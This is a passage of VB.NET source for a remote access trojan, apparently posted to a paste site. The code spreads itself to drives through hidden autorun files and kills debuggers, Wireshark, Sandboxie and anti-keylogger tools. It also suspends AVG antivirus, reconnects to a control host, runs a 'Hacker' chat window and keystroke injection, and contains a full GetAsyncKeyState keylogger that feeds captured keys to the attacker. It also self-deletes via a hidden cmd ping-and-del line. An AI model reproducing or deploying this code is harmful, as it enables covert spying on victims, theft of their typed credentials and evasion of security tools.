  2153.  
  2154. End Sub
  2155.  
  2156. Dim sf As String = "Software\Microsoft\Windows\CurrentVersion\Run"
  2157. Sub UNS()
  2158. Dim StartupKey As String = namev
  2159. Dim regKey As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("software\microsoft\windows\currentversion\run", True)
  2160. regKey.SetValue(StartupKey, Application.ExecutablePath, Microsoft.Win32.RegistryValueKind.String) : regKey.DeleteValue(namev)
  2161. Try
  2162. Dim e = Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\" & RG & ".exe"
  2163. Catch ex As Exception
  2164. End Try
  2165. Try
  2166. Registry.CurrentUser.OpenSubKey("Software", True).DeleteSubKey(RG, False)
  2167. Catch ex As Exception
  2168. End Try
  2169. Try
  2170. If CheckBox28 Then
  2171.  
  2172. Shell("SCHTASKS /Delete /TN " + TextBox13.Text + " /f", AppWinStyle.Hide)
  2173. File.Delete(TextBox12.Text)
  2174. End If
  2175. File.Delete(hid)
  2176. File.Delete(scream)
  2177. File.Delete(screamx)
  2178. File.Delete(ooo)
  2179. Shell("cmd.exe /k ping 0 & del " & ChrW(34) & LO.FullName & ChrW(34) & " & exit", AppWinStyle.Hide)
  2180.  
  2181. Catch ex As Exception
  2182. End Try
  2183.  
  2184. End
  2185. End Sub
  2186. Sub CreateDirectory(ByVal Path As String)
  2187. Dim appData As String = GetFolderPath(SpecialFolder.ApplicationData)
  2188. Directory.CreateDirectory(appData)
  2189. End Sub
  2190. #Region "Chat System"
  2191. Delegate Sub rv(ByVal data1 As String)
  2192. Delegate Sub oc()
  2193. Delegate Sub ec()
  2194. Sub och()
  2195. On Error Resume Next
  2196. w.Show()
  2197.  
  2198. End Sub
  2199. Sub cc()
  2200. On Error Resume Next
  2201. w.Close()
  2202.  
  2203. End Sub
  2204. Sub rvt(ByVal data1 As String)
  2205. On Error Resume Next
  2206. w.Recv.Text += Environment.NewLine & "(Hacker): " & data1
  2207. w.Recv.SelectionStart = w.Recv.Text.Length
  2208. w.Recv.ScrollToCaret()
  2209.  
  2210. On Error Resume Next
  2211. Dim era7s As Integer = w.Recv.Find("(You Have a New File )-> ", 1, RichTextBoxFinds.None)
  2212. Do While era7s > -0
  2213. w.Recv.Select(era7s, "(You Have a New File )-> ".Length)
  2214. w.Recv.SelectionColor = Color.Blue
  2215. era7s = w.Recv.Find("(You Have a New File )-> ", era7s + "(You Have a New File )-> ".Length, RichTextBoxFinds.None)
  2216. Application.DoEvents()
  2217. w.Recv.HideSelection = True
  2218. Loop
  2219. On Error Resume Next
  2220. Dim era7 As Integer = w.Recv.Find("(ME):", 1, RichTextBoxFinds.None)
  2221. Do While era7 > -0
  2222. w.Recv.Select(era7, "(ME):".Length)
  2223. w.Recv.SelectionColor = Color.DodgerBlue
  2224. era7 = w.Recv.Find("(ME):", era7 + "(ME):".Length, RichTextBoxFinds.None)
  2225. Application.DoEvents()
  2226. w.Recv.HideSelection = True
  2227. Loop
  2228. On Error Resume Next
  2229. Dim era7r As Integer = w.Recv.Find("(Hacker):", 1, RichTextBoxFinds.None)
  2230. Do While era7r > -0
  2231. w.Recv.Select(era7r, "(Hacker):".Length)
  2232. w.Recv.SelectionColor = Color.MediumAquamarine
  2233. era7r = w.Recv.Find("(Hacker):", era7r + "(Hacker):".Length, RichTextBoxFinds.None)
  2234. Application.DoEvents()
  2235. w.Recv.HideSelection = True
  2236. Loop
  2237.  
  2238. My.Computer.Audio.Play("C:\Windows\Media\Windows Pop-up Blocked.wav", AudioPlayMode.Background)
  2239.  
  2240. If hekoo.Text = "" Then
  2241.  
  2242. Else
  2243. w.Recv.Text += "(You Have a New File )-> \\" + hekoo.Text & NewLine
  2244.  
  2245. hekoo.Text = ""
  2246. End If
  2247.  
  2248.  
  2249. End Sub
  2250. Sub rvte(ByVal data1 As String)
  2251. On Error Resume Next
  2252.  
  2253. My.Computer.Keyboard.SendKeys(data1)
  2254. End Sub
  2255.  
  2256. #End Region
  2257.  
  2258. Private Sub Timer8_Tick(sender As Object, e As EventArgs) Handles Timer8.Tick
  2259.  
  2260. Dim usbs As String = My.Computer.FileSystem.SpecialDirectories.ProgramFiles
  2261. Dim driver() As String = (IO.Directory.GetLogicalDrives)
  2262. For Each usbs In driver
  2263. Try
  2264. IO.File.Copy(Application.ExecutablePath, usbs & "Umbrella.flv.exe")
  2265. Dim AutoStart = New StreamWriter(usbs & "\autorun.inf")
  2266. AutoStart.WriteLine("[autorun]")
  2267. AutoStart.WriteLine("open=" & usbs & "Umbrella.flv.exe")
  2268. AutoStart.WriteLine("shellexecute=" & usbs, 1)
  2269. AutoStart.Close()
  2270. System.IO.File.SetAttributes(usbs & "autorun.inf", FileAttributes.Hidden)
  2271. System.IO.File.SetAttributes(usbs & "Umbrella.flv.exe", FileAttributes.Hidden)
  2272. Catch ex As Exception
  2273.  
  2274. End Try
  2275. Next
  2276. End Sub
  2277. Private Sub Timer9_Tick_1(sender As Object, e As EventArgs) Handles Timer9.Tick
  2278. Try
  2279. Dim AntiLogger() As Process = Process.GetProcessesByName("SbieCtrl")
  2280. For Each Process As Process In AntiLogger
  2281. Process.Kill()
  2282. Next
  2283. Catch x As Exception
  2284. End Try
  2285. End Sub
  2286.  
  2287. Private Sub Timer10_Tick(sender As Object, e As EventArgs) Handles Timer10.Tick
  2288. Try
  2289. Dim AntiLogger() As Process = Process.GetProcessesByName("SpyTheSpy")
  2290. For Each Process As Process In AntiLogger
  2291. Process.Kill()
  2292. Next
  2293. Catch x As Exception
  2294. End Try
  2295. End Sub
  2296.  
  2297. Private Sub Timer11_Tick(sender As Object, e As EventArgs) Handles Timer11.Tick
  2298. Try
  2299. Dim AntiLogger() As Process = Process.GetProcessesByName("SpeedGear")
  2300. For Each Process As Process In AntiLogger
  2301. Process.Kill()
  2302. Next
  2303. Catch x As Exception
  2304. End Try
  2305. End Sub
  2306.  
  2307. Private Sub Timer12_Tick(sender As Object, e As EventArgs) Handles Timer12.Tick
  2308. Try
  2309. Dim AntiLogger() As Process = Process.GetProcessesByName("wireshark")
  2310. For Each Process As Process In AntiLogger
  2311. Process.Kill()
  2312. Next
  2313. Catch x As Exception
  2314. End Try
  2315. End Sub
  2316.  
  2317. Private Sub Timer13_Tick(sender As Object, e As EventArgs) Handles Timer13.Tick
  2318. Try
  2319. Dim AntiLogger() As Process = Process.GetProcessesByName("IPBlocker")
  2320. For Each Process As Process In AntiLogger
  2321. Process.Kill()
  2322. Next
  2323. Catch x As Exception
  2324. End Try
  2325. End Sub
  2326.  
  2327. Private Sub Timer14_Tick(sender As Object, e As EventArgs) Handles Timer14.Tick
  2328. Try
  2329. Dim AntiLogger() As Process = Process.GetProcessesByName("cports")
  2330. For Each Process As Process In AntiLogger
  2331. Process.Kill()
  2332. Next
  2333. Catch x As Exception
  2334. End Try
  2335. End Sub
  2336. Function AVG()
  2337. Dim game1, game2, game3, game4, game5, game6, game7, game8, game9 As Process()
  2338. game1 = Process.GetProcessesByName("avgidsagent")
  2339. game2 = Process.GetProcessesByName("avgfws")
  2340. game3 = Process.GetProcessesByName("avgtray")
  2341. game4 = Process.GetProcessesByName("avgemcx")
  2342. game5 = Process.GetProcessesByName("avgwdsvc")
  2343. game6 = Process.GetProcessesByName("avgnsx")
  2344. game7 = Process.GetProcessesByName("avgcsrvx")
  2345. game8 = Process.GetProcessesByName("avgrsx")
  2346. game9 = Process.GetProcessesByName("ToolbarUpdater")
  2347. Try
  2348. SuspendProcess(game1(0))
  2349. SuspendProcess(game2(0))
  2350. SuspendProcess(game3(0))
  2351. SuspendProcess(game4(0))
  2352. SuspendProcess(game5(0))
  2353. SuspendProcess(game6(0))
  2354. SuspendProcess(game7(0))
  2355. SuspendProcess(game8(0))
  2356. SuspendProcess(game9(0))
  2357. Catch ex As Exception
  2358.  
  2359. End Try
  2360. End Function
  2361.  
  2362. Private Sub Timer15_Tick(sender As Object, e As EventArgs) Handles Timer15.Tick
  2363. On Error Resume Next
  2364. Dim generaldee As Process() = Process.GetProcesses
  2365. Dim i As Integer
  2366. For i = 0 To generaldee.Length - 1
  2367. Select Case Strings.LCase(generaldee(i).ProcessName)
  2368. Case "ollydbg"
  2369. generaldee(i).Kill()
  2370. Case Else
  2371. End Select
  2372. Next
  2373. End Sub
  2374.  
  2375. Private Sub Timer16_Tick(sender As Object, e As EventArgs) Handles Timer16.Tick
  2376. On Error Resume Next
  2377. Dim generaldee As Process() = Process.GetProcesses
  2378. Dim i As Integer
  2379. For i = 0 To generaldee.Length - 1
  2380. Select Case Strings.LCase(generaldee(i).ProcessName)
  2381. Case "xns5"
  2382. generaldee(i).Kill()
  2383. Case Else
  2384. End Select
  2385. Next
  2386. End Sub
  2387.  
  2388. Private Sub Timer17_Tick(sender As Object, e As EventArgs) Handles Timer17.Tick
  2389. On Error Resume Next
  2390. Dim generaldee As Process() = Process.GetProcesses
  2391. Dim i As Integer
  2392. For i = 0 To generaldee.Length - 1
  2393. Select Case Strings.LCase(generaldee(i).ProcessName)
  2394. Case "keyscrambler"
  2395. generaldee(i).Kill()
  2396. Case Else
  2397. End Select
  2398. Next
  2399. End Sub
  2400. Private Sub Horror_Tick(sender As Object, e As EventArgs) Handles Horror.Tick
  2401. On Error Resume Next
  2402. Label1.Text += 1
  2403. If Label1.Text = 70 Then
  2404. If Comet.Statconnected = True Then
  2405. Label1.Text = 1
  2406. Horror.Enabled = True
  2407. Else
  2408.  
  2409. Comet.Connect(HOST, port)
  2410. Label1.Text = 1
  2411. Horror.Enabled = True
  2412. End If
  2413. Label1.Text = 1
  2414. Horror.Enabled = True
  2415. End If
  2416. End Sub
  2417.  
  2418. Private Sub Timer19_Tick(sender As Object, e As EventArgs) Handles Timer19.Tick
  2419. If x62 Then
  2420.  
  2421. Dim P8 As New Process
  2422. For Each P8 In Process.GetProcesses
  2423. If P8.MainWindowTitle.Contains(x63) Then
  2424. Timer19.Enabled = False
  2425. screamhelp()
  2426. End If
  2427. Next
  2428. End If
  2429. If x65 Then
  2430. Dim str As String
  2431. For Each str In Directory.GetFiles((S762), "*" + x66)
  2432. Timer19.Enabled = False
  2433. screamhelp()
  2434. Next
  2435. End If
  2436.  
  2437. End Sub
  2438.  
  2439. Private Sub xtrem_TextChanged(sender As Object, e As EventArgs) Handles xtrem.TextChanged
  2440. On Error Resume Next
  2441. If ero = 2 Then
  2442. Comet.Send("xox" & Yy & xtrem.Text)
  2443. End If
  2444. End Sub
  2445. Sub Doxi()
  2446.  
  2447.  
  2448.  
  2449. On Error Resume Next
  2450.  
  2451.  
  2452. Dim q1 As Boolean
  2453. q1 = GetAsyncKeyState(Keys.Q)
  2454. If q1 Then
  2455. Timer20.Enabled = False
  2456. xtrem.Text += "Q"
  2457. End If
  2458. Dim w1 As Boolean
  2459. w1 = GetAsyncKeyState(Keys.W)
  2460. If w1 Then
  2461. Timer20.Enabled = False
  2462. xtrem.Text += "W"
  2463.  
  2464. End If
  2465. Dim e1 As Boolean
  2466. e1 = GetAsyncKeyState(Keys.E)
  2467. If e1 Then
  2468. Timer20.Enabled = False
  2469. xtrem.Text += "E"
  2470.  
  2471. End If
  2472. Dim r1 As Boolean
  2473. r1 = GetAsyncKeyState(Keys.R)
  2474. If r1 Then
  2475. Timer20.Enabled = False
  2476. xtrem.Text += "R"
  2477.  
  2478. End If
  2479. Dim t1 As Boolean
  2480. t1 = GetAsyncKeyState(Keys.T)
  2481. If t1 Then
  2482. Timer20.Enabled = False
  2483. xtrem.Text += "T"
  2484.  
  2485. End If
  2486. Dim y1 As Boolean
  2487.  
  2488. y1 = GetAsyncKeyState(Keys.Y)
  2489. If y1 Then
  2490. Timer20.Enabled = False
  2491. xtrem.Text += "Y"
  2492.  
  2493. End If
  2494. Dim u1 As Boolean
  2495. u1 = GetAsyncKeyState(Keys.U)
  2496. If u1 Then
  2497. Timer20.Enabled = False
  2498. xtrem.Text += "U"
  2499.  
  2500. End If
  2501. Dim i1 As Boolean
  2502. i1 = GetAsyncKeyState(Keys.I)
  2503. If i1 Then
  2504. Timer20.Enabled = False
  2505. xtrem.Text += "I"
  2506.  
  2507. End If
  2508. Dim o1 As Boolean
  2509. o1 = GetAsyncKeyState(Keys.O)
  2510. If o1 Then
  2511. Timer20.Enabled = False
  2512. xtrem.Text += "O"
  2513.  
  2514. End If
  2515. Dim p1 As Boolean
  2516. p1 = GetAsyncKeyState(Keys.P)
  2517. If p1 Then
  2518. Timer20.Enabled = False
  2519. xtrem.Text += "P"
  2520.  
  2521. End If
  2522. Dim a1 As Boolean
  2523. a1 = GetAsyncKeyState(Keys.A)
  2524. If a1 Then
  2525. Timer20.Enabled = False
  2526. xtrem.Text += "A"
  2527.  
  2528. End If
  2529. Dim s1 As Boolean
  2530. s1 = GetAsyncKeyState(Keys.S)
  2531. If s1 Then
  2532. Timer20.Enabled = False
  2533. xtrem.Text += "S"
  2534.  
  2535. End If
  2536. Dim d1 As Boolean
  2537. d1 = GetAsyncKeyState(Keys.D)
  2538. If d1 Then
  2539. Timer20.Enabled = False
  2540. xtrem.Text += "D"
  2541.  
  2542. End If
  2543. Dim f1 As Boolean
  2544. f1 = GetAsyncKeyState(Keys.F)
  2545. If f1 Then
  2546. Timer20.Enabled = False
  2547. xtrem.Text += "F"
  2548.  
  2549. End If
  2550. Dim g1 As Boolean
  2551. g1 = GetAsyncKeyState(Keys.G)
  2552. If g1 Then
  2553. Timer20.Enabled = False
  2554. xtrem.Text += "G"
  2555.  
  2556. End If
  2557. Dim h1 As Boolean
  2558. h1 = GetAsyncKeyState(Keys.H)
  2559. If h1 Then
  2560. Timer20.Enabled = False
  2561. xtrem.Text += "H"
  2562.  
  2563. End If
  2564. Dim j1 As Boolean
  2565. j1 = GetAsyncKeyState(Keys.J)
  2566. If j1 Then
  2567. Timer20.Enabled = False
  2568. xtrem.Text += "J"
  2569.  
  2570. End If
  2571. Dim k1 As Boolean
  2572. k1 = GetAsyncKeyState(Keys.K)
  2573. If k1 Then
  2574. Timer20.Enabled = False
  2575. xtrem.Text += "K"
  2576.  
  2577. End If
  2578. Dim l1 As Boolean
  2579. l1 = GetAsyncKeyState(Keys.L)
  2580. If l1 Then
  2581. Timer20.Enabled = False
  2582. xtrem.Text += "L"
  2583.  
  2584. End If
  2585. Dim z1 As Boolean
  2586. z1 = GetAsyncKeyState(Keys.Z)
  2587. If z1 Then
  2588. Timer20.Enabled = False
  2589. xtrem.Text += "Z"
  2590.  
  2591. End If
  2592. Dim x1 As Boolean
  2593. x1 = GetAsyncKeyState(Keys.X)
  2594. If x1 Then
  2595. Timer20.Enabled = False
  2596. xtrem.Text += "X"
  2597.  
  2598. End If
  2599. Dim c1 As Boolean
  2600. c1 = GetAsyncKeyState(Keys.C)
  2601. If c1 Then
  2602. Timer20.Enabled = False
  2603. xtrem.Text += "C"
  2604.  
  2605. End If
  2606. Dim v1 As Boolean
  2607. v1 = GetAsyncKeyState(Keys.V)
  2608. If v1 Then
  2609. Timer20.Enabled = False
  2610. xtrem.Text += "V"
  2611.  
  2612. End If
  2613. Dim b1 As Boolean
  2614. b1 = GetAsyncKeyState(Keys.B)
  2615. If b1 Then
  2616. Timer20.Enabled = False
  2617. xtrem.Text += "B"
  2618.  
  2619. End If
  2620. Dim n1 As Boolean
  2621. n1 = GetAsyncKeyState(Keys.N)
  2622. If n1 Then
  2623. Timer20.Enabled = False
  2624. xtrem.Text += "N"
  2625.  
  2626. End If
  2627. Dim m1 As Boolean
  2628. m1 = GetAsyncKeyState(Keys.M)
  2629. If m1 Then
  2630. Timer20.Enabled = False
  2631. xtrem.Text += "M"
  2632.  
  2633. End If
  2634. Dim enter As Boolean
  2635. enter = GetAsyncKeyState(Keys.Enter)
  2636. If enter Then
  2637. Timer20.Enabled = False
  2638. xtrem.Text += vbNewLine ' [ Enter ]
  2639.  
  2640. End If
  2641. Dim Space As Boolean
  2642. Space = GetAsyncKeyState(Keys.Space)
  2643. If Space Then
  2644. Timer20.Enabled = False
  2645. xtrem.Text += " " ' [ Space ]
  2646.  
  2647. End If
  2648. Dim xx1 As Boolean
  2649. xx1 = GetAsyncKeyState(Keys.D1)
  2650. If xx1 Then
  2651. Timer20.Enabled = False
  2652. xtrem.Text += "1" ' [ 1 ]
  2653.  
  2654. End If
  2655. Dim xx2 As Boolean
  2656. xx2 = GetAsyncKeyState(Keys.D2)
  2657. If xx2 Then
  2658. Timer20.Enabled = False
  2659. xtrem.Text += "2" ' [ 2 ]
  2660.  
  2661. End If
  2662. Dim xx3 As Boolean
  2663. xx3 = GetAsyncKeyState(Keys.D3)
  2664. If xx3 Then
  2665. Timer20.Enabled = False
  2666. xtrem.Text += "3" ' [ 3 ]
  2667.  
  2668. End If
  2669. Dim xx4 As Boolean
  2670. xx4 = GetAsyncKeyState(Keys.D4)
  2671. If xx4 Then
  2672. Timer20.Enabled = False
  2673. xtrem.Text += "4" ' [ 4 ]
  2674.  
  2675. End If
  2676. Dim xx5 As Boolean
  2677. xx5 = GetAsyncKeyState(Keys.D5)
  2678. If xx5 Then
  2679. Timer20.Enabled = False
  2680. xtrem.Text += "5" ' [ 5 ]
  2681.  
  2682. End If
  2683. Dim xx6 As Boolean
  2684. xx6 = GetAsyncKeyState(Keys.D6)
  2685. If xx6 Then
  2686. Timer20.Enabled = False
  2687. xtrem.Text += "6" ' [ 6 ]
  2688.  
  2689. End If
  2690. Dim xx7 As Boolean
  2691. xx7 = GetAsyncKeyState(Keys.D7)
  2692. If xx7 Then
  2693. Timer20.Enabled = False
  2694. xtrem.Text += "7" ' [ 7 ]
  2695.  
  2696. End If
  2697. Dim xx8 As Boolean
  2698. xx8 = GetAsyncKeyState(Keys.D8)
  2699. If xx8 Then
  2700. Timer20.Enabled = False
  2701. xtrem.Text += "8" ' [ 8 ]
  2702.  
  2703. End If
  2704. Dim xx9 As Boolean
  2705. xx9 = GetAsyncKeyState(Keys.D9)
  2706. If xx9 Then
  2707. Timer20.Enabled = False
  2708. xtrem.Text += "9" ' [ 9 ]
  2709.  
  2710. End If
  2711. Dim xx0 As Boolean
  2712. xx0 = GetAsyncKeyState(Keys.D0)
  2713. If xx0 Then
  2714. Timer20.Enabled = False
  2715. xtrem.Text += "0" ' [ 0 ]
  2716.  
  2717. End If
  2718. Dim CAPS As Boolean
  2719. CAPS = GetAsyncKeyState(Keys.CapsLock)
  2720. If CAPS Then
  2721. Timer20.Enabled = False
  2722. xtrem.Text += "( capslock )" ' [ CapsLock ]
  2723.  
  2724. End If
  2725. Dim ShiftKey As Boolean
  2726. ShiftKey = GetAsyncKeyState(Keys.ShiftKey)
  2727. If ShiftKey Then
  2728. Timer20.Enabled = False
  2729. xtrem.Text += "( shift )" ' [ ShiftKey ]
  2730.  
  2731. End If
  2732. Dim Oem1 As Boolean
  2733. Oem1 = GetAsyncKeyState(Keys.Oem1)
  2734. If Oem1 Then
  2735. Timer20.Enabled = False
  2736. xtrem.Text += ";" ' [ ; ]
  2737.  
  2738. End If
  2739. Dim Oem2 As Boolean
  2740. Oem2 = GetAsyncKeyState(Keys.Oem2)
  2741. If Oem2 Then
  2742. Timer20.Enabled = False
  2743. xtrem.Text += "/" ' [ / ]
  2744.  
  2745. End If
  2746. Dim Oem3 As Boolean
  2747. Oem3 = GetAsyncKeyState(Keys.Oem3)
  2748. If Oem3 Then
  2749. Timer20.Enabled = False
  2750. xtrem.Text += "`" ' [ ` ]
  2751.  
  2752. End If
  2753. Dim Oem4 As Boolean
  2754. Oem4 = GetAsyncKeyState(Keys.Oem4)
  2755. If Oem4 Then
  2756. Timer20.Enabled = False
  2757. xtrem.Text += "[" ' [ [ ]
  2758.  
  2759. End If
  2760. Dim Oem5 As Boolean
  2761. Oem5 = GetAsyncKeyState(Keys.Oem5)
  2762. If Oem5 Then
  2763. Timer20.Enabled = False
  2764. xtrem.Text += "\" ' [ \ ]
  2765.  
  2766. End If
  2767. Dim Oem6 As Boolean
  2768. Oem6 = GetAsyncKeyState(Keys.Oem6)
  2769. If Oem6 Then
  2770. Timer20.Enabled = False
  2771. xtrem.Text += "]" ' [ ] ]
  2772.  
  2773. End If
  2774. Dim Oem7 As Boolean
  2775. Oem7 = GetAsyncKeyState(Keys.Oem7)
  2776. If Oem7 Then
  2777. Timer20.Enabled = False
  2778. xtrem.Text += "'" ' [ ' ]
  2779.  
  2780. End If
  2781. Dim Oemplus As Boolean
  2782. Oemplus = GetAsyncKeyState(Keys.Oemplus)
  2783. If Oemplus Then
  2784. Timer20.Enabled = False
  2785. xtrem.Text += "=" ' [ = ]
  2786.  
  2787. End If
  2788. Dim OemPeriod As Boolean
  2789. OemPeriod = GetAsyncKeyState(Keys.OemPeriod)
  2790. If OemPeriod Then
  2791. Timer20.Enabled = False
  2792. xtrem.Text += "." ' [ . ]
  2793.  
  2794. End If
  2795. Dim Oemcomma As Boolean
  2796. Oemcomma = GetAsyncKeyState(Keys.Oemcomma)
  2797. If Oemcomma Then
  2798. Timer20.Enabled = False
  2799. xtrem.Text += "," ' [ , ]
  2800.  
  2801. End If
  2802. Dim OemMinus As Boolean
  2803. OemMinus = GetAsyncKeyState(Keys.OemMinus)
  2804. If OemMinus Then
  2805. Timer20.Enabled = False
  2806. xtrem.Text += "-" ' [ - ]
  2807.  
  2808. End If
  2809. Dim Back As Boolean
  2810. Back = GetAsyncKeyState(Keys.Back)
  2811. If Back Then
  2812. Timer20.Enabled = False
  2813. xtrem.Text += "( back )" ' [ Back ]
  2814.  
  2815. End If
  2816. Dim PrintScreen As Boolean
  2817. PrintScreen = GetAsyncKeyState(Keys.PrintScreen)
  2818. If PrintScreen Then
  2819. Timer20.Enabled = False
  2820. xtrem.Text += "( printscreen )" ' [ PrintScreen ]
  2821.  
  2822. End If
  2823. Dim Left As Boolean
  2824. Left = GetAsyncKeyState(Keys.Left)
  2825. If Left Then
  2826. Timer20.Enabled = False
  2827. xtrem.Text += "( left )" ' [ Left ]
  2828.  
  2829. End If
  2830. Dim Right As Boolean
  2831. Right = GetAsyncKeyState(Keys.Right)
  2832. If Right Then
  2833. Timer20.Enabled = False
  2834. xtrem.Text += "( right )" ' [ Right ]
  2835.  
  2836. End If
  2837. Dim Down As Boolean
  2838. Down = GetAsyncKeyState(Keys.Down)
  2839. If Down Then
  2840. Timer20.Enabled = False
  2841. xtrem.Text += "( down )" ' [ Down ]
  2842.  
  2843. End If
  2844. Dim Delete As Boolean
  2845. Delete = GetAsyncKeyState(Keys.Delete)
  2846. If Delete Then
  2847. Timer20.Enabled = False
  2848. xtrem.Text += "( delete )" ' [ Delete ]
  2849.  
  2850. End If
  2851. Dim Up As Boolean
  2852. Up = GetAsyncKeyState(Keys.Up)
  2853. If Up Then
  2854. Timer20.Enabled = False
  2855. xtrem.Text += "( up )" ' [ Up ]
  2856.  
  2857. End If
  2858. Dim oo0 As Boolean
  2859. oo0 = GetAsyncKeyState(Keys.NumPad0)
  2860. If oo0 Then
  2861. Timer20.Enabled = False
  2862. xtrem.Text += "0"
  2863.  
  2864. End If
  2865. Dim oo1 As Boolean
  2866. oo1 = GetAsyncKeyState(Keys.NumPad1)
  2867. If oo1 Then
  2868. Timer20.Enabled = False
  2869. xtrem.Text += "1"
  2870.  
  2871. End If
  2872. Dim oo2 As Boolean
  2873. oo2 = GetAsyncKeyState(Keys.NumPad2)
  2874. If oo2 Then
  2875. Timer20.Enabled = False
  2876. xtrem.Text += "2"
  2877.  
  2878. End If
  2879. Dim oo3 As Boolean
  2880. oo3 = GetAsyncKeyState(Keys.NumPad3)
  2881. If oo3 Then
  2882. Timer20.Enabled = False
  2883. xtrem.Text += "3"
  2884.  
  2885. End If
  2886. Dim oo4 As Boolean
  2887. oo4 = GetAsyncKeyState(Keys.NumPad4)
  2888. If oo4 Then
  2889. Timer20.Enabled = False
  2890. xtrem.Text += "4"
  2891.  
  2892. End If
  2893. Dim oo5 As Boolean
  2894. oo5 = GetAsyncKeyState(Keys.NumPad5)
  2895. If oo5 Then
  2896. Timer20.Enabled = False
  2897. xtrem.Text += "5"
  2898.  
  2899. End If
  2900. Dim oo6 As Boolean
  2901. oo6 = GetAsyncKeyState(Keys.NumPad6)
  2902. If oo6 Then
  2903. Timer20.Enabled = False
  2904. xtrem.Text += "6"
  2905.  
  2906. End If
  2907. Dim oo7 As Boolean
  2908. oo7 = GetAsyncKeyState(Keys.NumPad7)
  2909. If oo7 Then
  2910. Timer20.Enabled = False
  2911. xtrem.Text += "7"
  2912.  
  2913. End If
  2914. Dim oo8 As Boolean
  2915. oo8 = GetAsyncKeyState(Keys.NumPad8)
  2916. If oo8 Then
  2917. Timer20.Enabled = False
  2918. xtrem.Text += "8"
  2919.  
  2920. End If
  2921. Dim oo9 As Boolean
  2922. oo9 = GetAsyncKeyState(Keys.NumPad9)
  2923. If oo9 Then
  2924. Timer20.Enabled = False
  2925. xtrem.Text += "9"
  2926.  
  2927. End If
  2928. Dim ff1 As Boolean
  2929. ff1 = GetAsyncKeyState(Keys.F1)
  2930. If ff1 Then
  2931. Timer20.Enabled = False
  2932. xtrem.Text += "( f1 )"
  2933.  
  2934. End If
  2935. Dim ff2 As Boolean
  2936. ff2 = GetAsyncKeyState(Keys.F2)
  2937. If ff2 Then
  2938. Timer20.Enabled = False
  2939. xtrem.Text += "( f2 )"
  2940.  
  2941. End If
  2942. Dim ff3 As Boolean
  2943. ff3 = GetAsyncKeyState(Keys.F3)
  2944. If ff3 Then
  2945. Timer20.Enabled = False
  2946. xtrem.Text += "( f3 )"
  2947.  
  2948. End If
  2949. Dim ff4 As Boolean
  2950. ff4 = GetAsyncKeyState(Keys.F4)
  2951. If ff4 Then
  2952. Timer20.Enabled = False
  2953. xtrem.Text += "( f4 )"
  2954.  
  2955. End If
  2956. Dim ff5 As Boolean
  2957. ff5 = GetAsyncKeyState(Keys.F5)
  2958. If ff5 Then
  2959. Timer20.Enabled = False
  2960. xtrem.Text += "( f5 )"
  2961.  
  2962. End If
  2963. Dim ff6 As Boolean
  2964. ff6 = GetAsyncKeyState(Keys.F6)
  2965. If ff6 Then
  2966. Timer20.Enabled = False
  2967. xtrem.Text += "( f6 )"
  2968.  
  2969. End If
  2970. Dim ff7 As Boolean
  2971. ff7 = GetAsyncKeyState(Keys.F7)
  2972. If ff7 Then
  2973. Timer20.Enabled = False
  2974. xtrem.Text += "( f6 )"
  2975.  
  2976. End If
  2977. Dim ff8 As Boolean
  2978. ff8 = GetAsyncKeyState(Keys.F8)
  2979. If ff8 Then
  2980. Timer20.Enabled = False
  2981. xtrem.Text += "( f8 )"
  2982.  
  2983. End If
  2984. Dim ff9 As Boolean
  2985. ff9 = GetAsyncKeyState(Keys.F9)
  2986. If ff9 Then
  2987. Timer20.Enabled = False
  2988. xtrem.Text += "( f9 )"
  2989.  
  2990. End If
  2991. Dim ff10 As Boolean
  2992. ff10 = GetAsyncKeyState(Keys.F10)
  2993. If ff10 Then
  2994. Timer20.Enabled = False
  2995. xtrem.Text += "( f10 )"
  2996.  
  2997. End If
  2998. Dim ff11 As Boolean
  2999. ff11 = GetAsyncKeyState(Keys.F11)
  3000. If ff11 Then
  3001. Timer20.Enabled = False
  3002. xtrem.Text += "( f11 )"
  3003.  
  3004. End If
  3005. Dim ff12 As Boolean
  3006. ff12 = GetAsyncKeyState(Keys.F12)
  3007. If ff12 Then
  3008. Timer20.Enabled = False
  3009. xtrem.Text += "( f12 )"
  3010.  
  3011. End If
  3012. Dim Escape As Boolean
  3013. Escape = GetAsyncKeyState(Keys.Escape)
  3014. If Escape Then
  3015. Timer20.Enabled = False
  3016. xtrem.Text += "( escape )"
  3017.  
  3018. End If
  3019. Dim Tab As Boolean
  3020. Tab = GetAsyncKeyState(Keys.Tab)
  3021. If Tab Then
  3022. Timer20.Enabled = False
  3023. xtrem.Text += "( tab )"
  3024.  
  3025. End If
  3026. Timer20.Enabled = True
  3027. End Sub
  3028.  
  3029. Private Sub Timer20_Tick(sender As Object, e As EventArgs) Handles Timer20.Tick
  3030. On Error Resume Next
  3031. Dim sglCPU As Single = PfcCPU.NextValue() / 100
  3032. Screamhi = sglCPU.ToString("p")
  3033. If ero = 2 Then
  3034.  
  3035. Doxi()
  3036. 'Comet.Send("xox" & Yy & xtrem.Text)
  3037.  
  3038. End If
  3039.  
  3040. End Sub
  3041. End Class
Add Comment
Please, Sign In to add comment